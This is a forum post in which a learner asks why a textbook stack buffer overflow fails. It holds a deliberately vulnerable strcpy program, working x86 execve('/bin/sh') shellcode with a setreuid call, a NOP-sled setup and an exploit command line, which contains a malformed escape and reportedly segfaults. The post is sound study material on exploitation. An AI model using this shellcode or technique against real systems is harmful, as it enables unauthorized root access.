Stack and Buffer Overflow Confusion


Hello,

at the moment I read a book called "Forbitten Code". In this books are
examples but they never work for me, although I'm sure that I understood
everything. My question is not exactly an assembler question but I hope
you can help me, because I think you assembler programmers understand of
these things most.
I want to describe the example. It is about getting root permissions on
the own computer with help of a buffer overflow.
First of all there is the vulnerable program:

#include <string.h>

int main(int argc, char **argv) {

char buffer[5];
strcpy(buffer, argv[1]);
return 0;
}

Then I saved the shellcode to a variable SHELLCODE, I got from the book.
The shellcode looks like this:

\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88
\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c
\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68

It is described that x90 is the "No Operation"-instruction. "shellcode"
contains 46 hex-numbers, which also includes /bin/sh as you can see below:

export SHELLCODE=`perl -e 'print "\x90"x200;'``cat shellcode`

Then I looked into the stack:

0xbfd13510: "HOSTNAME=gentoo"
0xbfd13520: "SHELLCODE=", '\220' <repeats 190 times>...
0xbfd135e8:
"\220\220\220\220\220\220\220\220\220\2201À°F1Û1ÉÍ\200ë\026[1À\210C\a\211[\b\211C\f°\v\215K\b\215S\fÍ\200èåÿÿÿ/bin/sh"
0xbfd13621: "SHELL=/bin/bash"

Because the address 0xbfd13520 contains the string "SHELLCODE", I have
to choose a later address to get to the code, so I chose at least
0xbfd13530.
Now I can use these address as the jump-back-address for the buffer
overflow. I have to assign the hex-numbers with the little endian order
because my processor is an Intel. (btw, I also tried a 100-times loop below)

../vuln `perl -e 'print "\x30\x35\xd1\bf"x10;'`

When I start vuln with the parameters, I just get a SEGMENTATION FAULT
instead of root-rights.
First I thought that the shellcode could be wrong but in an earlier
example I managed it to get root-privileges, but _only_ once.
Can anybody imagine where this example fails?

Thanks,
Markus

.

Relevant Pages

  • Stack Confusion with Buffer Overflow
    ... at the moment I read a book called "Forbitten Code". ... the own computer with help of a buffer overflow. ... Then I saved the shellcode to a variable SHELLCODE, ...
    (comp.unix.programmer)
  • Re: OT? Are chroots immune to buffer overflows?
    ... There has also been shellcode which will listen on a port, ... which it will then execute as shell code thus nullifying the need to have ... > The buffer overflow still works as expected (the bug is in the daemon, ...
    (Vuln-Dev)
  • RE: What does the code mean?
    ... Shellcode, which is used in a buffer overflow exploit. ... resource on this... ... Stephane Auger ...
    (Security-Basics)
  • Re: OT? Are chroots immune to buffer overflows?
    ... I've heard of shellcode that supposedly jumps out of the chroot jail, ... it's probably been fixed now (whatever bug in chroot the shellcode ... The buffer overflow would work ... dropped a bash shell in there:) ...
    (Vuln-Dev)